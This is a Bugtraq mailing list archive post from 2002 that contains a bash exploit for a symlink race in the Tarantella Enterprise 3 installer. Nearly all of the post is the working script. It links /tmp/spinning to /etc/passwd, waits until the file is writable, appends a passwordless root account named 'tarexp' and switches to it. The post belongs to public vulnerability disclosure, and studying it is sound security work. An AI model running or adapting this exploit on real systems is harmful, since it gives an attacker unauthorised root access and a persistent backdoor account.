Home page logo
/

bugtraq logo Bugtraq mailing list archives

Exploit for Tarantella Enterprise installation (bid 4115)
From: "Larry W. Cashdollar" <lwc () vapid dhs org>
Date: Sun, 24 Feb 2002 08:59:38 -0500 (EST)


Had some idle time and wrote this, tested under Linux.



#!/bin/bash
#Larry W. Cashdollar  lwc () vapid dhs org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux.  run and wait.


echo "Creating symlink."

/bin/ln -s /etc/passwd /tmp/spinning

echo "Waiting for tarantella installation."

while true
do
echo -n .
if [ -w /etc/passwd ]
then
        echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        su - tarexp
        exit
fi
done


  By Date           By Thread  

Current thread:
  • Exploit for Tarantella Enterprise installation (bid 4115) Larry W. Cashdollar (Feb 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]